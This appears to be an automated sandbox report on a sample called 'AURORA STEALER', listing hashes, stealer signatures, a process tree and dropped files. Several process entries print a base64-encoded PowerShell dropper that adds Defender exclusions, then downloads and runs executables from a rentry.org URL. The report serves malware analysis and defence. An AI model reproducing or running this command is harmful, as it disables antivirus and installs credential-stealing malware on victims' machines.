Analysis

  • max time kernel
    140s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-07-2024 16:42

General

  • Target

    AURORA STEALER.rar

  • Size

    10.9MB

  • MD5

    7077d053f377ac289bde8e57de60f4a5

  • SHA1

    779664f5ff55cd1035e58f2f5568e8a41a370288

  • SHA256

    282cd2c35141a47148dae9a17263d20edf209dca310112ebb11c47710091fdf7

  • SHA512

    9118b53f275784ad90a3a7bfc5cd578a51fb000bff5d9beab14a4c47b3e2ba8b7c005530c3871166172f6edf090c9763d811225bedeb2327c8034d2a67511a67

  • SSDEEP

    196608:JXoE/rNj9hezMG/8YV8XUEQNar9lG45v/MdB3Nb2e9mMIF0HjS:JBpheIGEzHEi/kNb2esF9

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/sb54d2/raw

Signatures

  • Aurora

    Aurora is a crypto wallet stealer written in Golang.

  • Shurk

    Shurk is an infostealer, written in C++ which appeared in 2021.

  • Shurk Stealer payload 11 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 46 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\AURORA STEALER.rar"
    1⤵
    • Modifies registry class
    PID:3348
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4596
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\AURORA STEALER.rar"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4964
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\AURORA STEALER.rar"
        3⤵
        • Checks processor information in registry
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2152
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 25753 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {255ca822-40d3-480b-9327-f587583cd199} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" gpu
          4⤵
            PID:1004
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 26673 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8c28ea6-fb9c-4220-82b6-bceb437cc508} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" socket
            4⤵
              PID:3132
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3360 -childID 1 -isForBrowser -prefsHandle 3420 -prefMapHandle 3276 -prefsLen 26814 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3232f438-8d34-45ec-9f10-e3b19adfb174} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab
              4⤵
                PID:1540
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 2 -isForBrowser -prefsHandle 3636 -prefMapHandle 3632 -prefsLen 31163 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {438bedc0-588b-4131-a28a-2d5f10f0c68f} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab
                4⤵
                  PID:4036
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5332 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5312 -prefMapHandle 5316 -prefsLen 29276 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b195af93-cc02-4220-a742-7013d91c2cb3} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" utility
                  4⤵
                  • Checks processor information in registry
                  PID:5764
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5280 -childID 3 -isForBrowser -prefsHandle 5436 -prefMapHandle 5428 -prefsLen 27130 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {faaa1eec-85f9-414e-8207-f8c792207c87} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab
                  4⤵
                    PID:5888
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 4 -isForBrowser -prefsHandle 5604 -prefMapHandle 5608 -prefsLen 27130 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e010fa25-7934-41db-853f-eb1e8edccf47} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab
                    4⤵
                      PID:5932
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5916 -childID 5 -isForBrowser -prefsHandle 5836 -prefMapHandle 5840 -prefsLen 27130 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec5846be-7dd6-4620-b7b5-022ccb4f9c3f} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab
                      4⤵
                        PID:5944
                • C:\Windows\System32\rundll32.exe
                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                  1⤵
                    PID:5264
                  • C:\Program Files\7-Zip\7zG.exe
                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\AURORA STEALER\" -spe -an -ai#7zMap29288:108:7zEvent5361
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:5392
                  • C:\Program Files\7-Zip\7zG.exe
                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\AURORA STEALER\" -spe -an -ai#7zMap28592:108:7zEvent17756
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:3128
                  • C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe
                    "C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe"
                    1⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    PID:4984
                    • C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
                      "C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:2940
                    • C:\Users\Admin\AppData\Local\Temp\black.exe
                      "C:\Users\Admin\AppData\Local\Temp\black.exe"
                      2⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      PID:3692
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBqAHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwBsAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBrAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHMAYgA1ADQAZAAyAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBxAHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAYQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBsAGwAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGoAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBlAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHYAZgBqACMAPgA="
                        3⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2448
                  • C:\Windows\system32\taskmgr.exe
                    "C:\Windows\system32\taskmgr.exe" /4
                    1⤵
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:2028
                  • C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe
                    "C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe"
                    1⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    PID:3676
                    • C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
                      "C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"
                      2⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      PID:4516
                    • C:\Users\Admin\AppData\Local\Temp\black.exe
                      "C:\Users\Admin\AppData\Local\Temp\black.exe"
                      2⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      PID:2844
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBqAHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwBsAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBrAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHMAYgA1ADQAZAAyAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBxAHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAYQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBsAGwAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGoAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBlAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHYAZgBqACMAPgA="
                        3⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5920
                  • C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe
                    "C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe"
                    1⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    PID:2436
                    • C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
                      "C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:5844
                    • C:\Users\Admin\AppData\Local\Temp\black.exe
                      "C:\Users\Admin\AppData\Local\Temp\black.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:5940
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBqAHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwBsAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBrAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHMAYgA1ADQAZAAyAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBxAHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAYQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBsAGwAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGoAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBlAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHYAZgBqACMAPgA="
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:1032
                  • C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe
                    "C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe"
                    1⤵
                      PID:3480
                      • C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe
                        "C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"
                        2⤵
                          PID:3632
                        • C:\Users\Admin\AppData\Local\Temp\black.exe
                          "C:\Users\Admin\AppData\Local\Temp\black.exe"
                          2⤵
                            PID:3464
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBqAHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYwBsAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBrAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHMAYgA1ADQAZAAyAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBxAHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGkAYQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBsAGwAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGoAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBlAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHYAZgBqACMAPgA="
                              3⤵
                              • Command and Scripting Interpreter: PowerShell
                              PID:2576

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\black.exe.log

                          Filesize

                          226B

                          MD5

                          28d7fcc2b910da5e67ebb99451a5f598

                          SHA1

                          a5bf77a53eda1208f4f37d09d82da0b9915a6747

                          SHA256

                          2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

                          SHA512

                          2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          2f57fde6b33e89a63cf0dfdd6e60a351

                          SHA1

                          445bf1b07223a04f8a159581a3d37d630273010f

                          SHA256

                          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                          SHA512

                          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          66898dbf1d1f32af63256328731f2c9e

                          SHA1

                          21f5828b21fae6d81e57a11e113440c95e1752de

                          SHA256

                          258ea4ccbc181f6b86d3a819981d9cf526950f1aa7517b12cda14b856aad8c90

                          SHA512

                          65ab1f1224ba418a733b6fe9aecead3c97cb92bf236ffddd77ab70361d81d3d02c24e45c7db1019724d52a0556e2248ed23f696cb49b970efce0bba1666b5e94

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          02a1a26525c65a359d41483180eaa6f7

                          SHA1

                          c0e2578b92d20e925c1c87016d1a9fccee1ec56f

                          SHA256

                          d0ec351493bdbc6cb94990b162bb8be5b0217277cc55ae12aa3c7ea704cdbc6e

                          SHA512

                          d3271137241553f8316fcfc94dcf88c2887ee7bb0babddb4c1666fb5ae821a28425400299281422a4ebeb1f4c7369443b839d10f182279504bbba5f2f1cd94c2

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          75b4b2eecda41cec059c973abb1114c0

                          SHA1

                          11dadf4817ead21b0340ce529ee9bbd7f0422668

                          SHA256

                          5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134

                          SHA512

                          87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

                        • C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe

                          Filesize

                          25.4MB

                          MD5

                          ad9aa927339dc830a38021afbe20a85f

                          SHA1

                          8017bea5f073064a27f61390ce6433cc110f55ea

                          SHA256

                          6815733e84bc19b0e7d24533f6295c929cd48be501b226e3a9fd12806a7a4e71

                          SHA512

                          43d95d09404f4407083f25ac59f9c31855ed715309037be6ba9e05d26af3ee073e786ee2d12f72f3e1fedebf8529c8b31dc2b7e485ab08b7e21fce2abcf260fd

                        • C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe

                          Filesize

                          10.2MB

                          MD5

                          1f63351aae774ff5ba57f7a15c3653f6

                          SHA1

                          85be2129f73a0dcc4fc3952cee70c3457372587e

                          SHA256

                          5cc2221f2fa692310c595cfe40c81d917b45b96de0b26c71513c5a71415bddc0

                          SHA512

                          599d91ca5eda5e62794fff22c1a53582c52f8db68ef5aeec390722bf9ff004ec66204db83a61f57bec65a49da0205cc644f5e12cf368e0e2063bb9255f529ace

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ajwaw4ox.p2y.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\black.exe

                          Filesize

                          74KB

                          MD5

                          b755c4a6af6e4616b7174e9184d4bd01

                          SHA1

                          e856e899dcd618263c28ed7f635b2a95746564a2

                          SHA256

